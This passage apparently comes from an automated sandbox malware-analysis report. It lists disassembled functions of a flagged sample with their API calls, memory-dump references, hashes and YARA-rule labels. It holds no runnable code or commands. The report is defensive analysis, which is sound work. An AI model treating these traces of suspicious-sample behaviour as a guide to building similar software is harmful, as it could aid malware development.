                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___scrt_is_nonwritable_in_current_image___scrt_uninitialize_crt
                                                                                                                                                            • String ID: VPWh
                                                                                                                                                            • API String ID: 2554503057-353207083
                                                                                                                                                            • Opcode ID: efa644ab2166baf05e9ed58277d2971d9a75add7947a8a0aa22cc12a000f03a4
                                                                                                                                                            • Instruction ID: f9c9449086d4a0deb6b12bd9cf7f465f27e8a10aa2fea480e3b72a2cbb87332a
                                                                                                                                                            • Opcode Fuzzy Hash: efa644ab2166baf05e9ed58277d2971d9a75add7947a8a0aa22cc12a000f03a4
                                                                                                                                                            • Instruction Fuzzy Hash: 17F0D632A087696ACA307BB89806F7E6B94FF81760F14093AF791F72D3CE655C008559
                                                                                                                                                            Function 008ED91A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fprintf_l
                                                                                                                                                            • String ID: $%s$@%s
                                                                                                                                                            • API String ID: 3906573944-834177443
                                                                                                                                                            • Opcode ID: feba8c984e859516ce7d7ba68ce52cbf17dee13cb0948ba7e8d14a171e00cc57
                                                                                                                                                            • Instruction ID: 2964e854a3c66bce898133ab1a239caff317a7ec27fe64cf16a839a2a5c18ace
                                                                                                                                                            • Opcode Fuzzy Hash: feba8c984e859516ce7d7ba68ce52cbf17dee13cb0948ba7e8d14a171e00cc57
                                                                                                                                                            • Instruction Fuzzy Hash: 0C01717254028CAADB21EEB5CD46EEE7FE8FF52708F040411FA20D61A3E222D6589B11
                                                                                                                                                            Function 008E1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008EE2E8: _swprintf.LIBCMT ref: 008EE30E
                                                                                                                                                              • Part of subcall function 008EE2E8: _strlen.LIBCMT ref: 008EE32F
                                                                                                                                                              • Part of subcall function 008EE2E8: SetDlgItemTextW.USER32(?,0091E274,?), ref: 008EE38F
                                                                                                                                                              • Part of subcall function 008EE2E8: GetWindowRect.USER32(?,?), ref: 008EE3C9
                                                                                                                                                              • Part of subcall function 008EE2E8: GetClientRect.USER32(?,?), ref: 008EE3D5
                                                                                                                                                            • GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                            • SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 2622349952-4108050209
                                                                                                                                                            • Opcode ID: f42224bee156d52d348d9f9e3f2e61dda7adb1e1bc742a26afa9181647742b2c
                                                                                                                                                            • Instruction ID: 256ad6bccea4303dc6410ff7eb1b0f6be520e9977ca127894298486334dcef00
                                                                                                                                                            • Opcode Fuzzy Hash: f42224bee156d52d348d9f9e3f2e61dda7adb1e1bc742a26afa9181647742b2c
                                                                                                                                                            • Instruction Fuzzy Hash: AAF03C701483CCAADF151F66980DAEA3BA9FB56348F048614FD48A5AE1CB78C990AB50

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00415660 Relevance: 163.2, APIs: 92, Strings: 1, Instructions: 495COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 004156CA
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                            • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004157B7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 004157C8
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 004157CB
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004157D6
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,00000000), ref: 004157DD
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004157FF
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415824
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004,?), ref: 00415839
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 0041583C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415847
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0041584A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000000), ref: 00415865
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00415879
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041588E
                                                                                                                                                            • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00415898
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415855
                                                                                                                                                              • Part of subcall function 0040EAB0: #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0040EB1A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                              • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                              • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0000,?), ref: 004158D0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004158DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0000,?), ref: 004158EC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004158F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415907
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041590C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415915
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041591A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00415932
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415941
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041594D
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00415957
                                                                                                                                                            • #525.MSVBVM60(00001000), ref: 00415962
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041596D
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159A3
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004159AC
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159B4
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004159BD
                                                                                                                                                            • #525.MSVBVM60(?), ref: 004159E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004159F4
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159F9
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00415A02
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415A0A
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415A13
                                                                                                                                                            • #594.MSVBVM60(0000000A), ref: 00415A37
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415A40
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00415A5C
                                                                                                                                                            • #593.MSVBVM60(0000000A), ref: 00415A86
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415AAF
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415ABD
                                                                                                                                                            • __vbaFpUI1.MSVBVM60 ref: 00415ADF
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415AF7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00415B1F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415B6D
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415B79
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • #593.MSVBVM60(0000000A), ref: 00415BB3
                                                                                                                                                            • __vbaFpI4.MSVBVM60 ref: 00415BD5
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415BE0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00415BF4
                                                                                                                                                            • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00415C0C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C17
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415C23
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C42
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00415C51
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C55
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415C5E
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C63
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00415C6C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C70
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00415C73
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00415C7C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,00415D0C), ref: 00415CE6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CF5
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CFA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CFF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415D04
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00415D28
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                                                                                            • String ID: 0000
                                                                                                                                                            • API String ID: 292954213-211534962
                                                                                                                                                            • Opcode ID: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                            • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                                                                                                                            • Opcode Fuzzy Hash: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                            • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59
                                                                                                                                                            Function 00411590 Relevance: 161.5, APIs: 91, Strings: 1, Instructions: 456COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409C6C,?,00000000), ref: 004115AE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115DB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115E7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115F3
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00411602
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411621
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411630
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411644
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00411652
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411662
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411669
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411676
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004116AD
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004116B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004116BF
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004116CF
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004116DA
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004116EA
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004116F7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0041170C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00411720
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00411735
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 0041173C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041175E
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,00000000,004025E6), ref: 0041178B
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,004025E6), ref: 00411792
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117A9
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 004117B0
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117DB
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(?,00000000), ref: 004117E6
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117F6
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00411803
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411832
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041183B
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                              • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041186A
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411879
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041188D
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041189B
                                                                                                                                                            • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118AD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118B8
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411911
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041191E
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041192E
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041193B
                                                                                                                                                            • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411979
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411984
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411994
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119A1
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119B1
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119BE
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E0
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E7
                                                                                                                                                            • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A16
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A25
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A39
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A47
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A57
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A5E
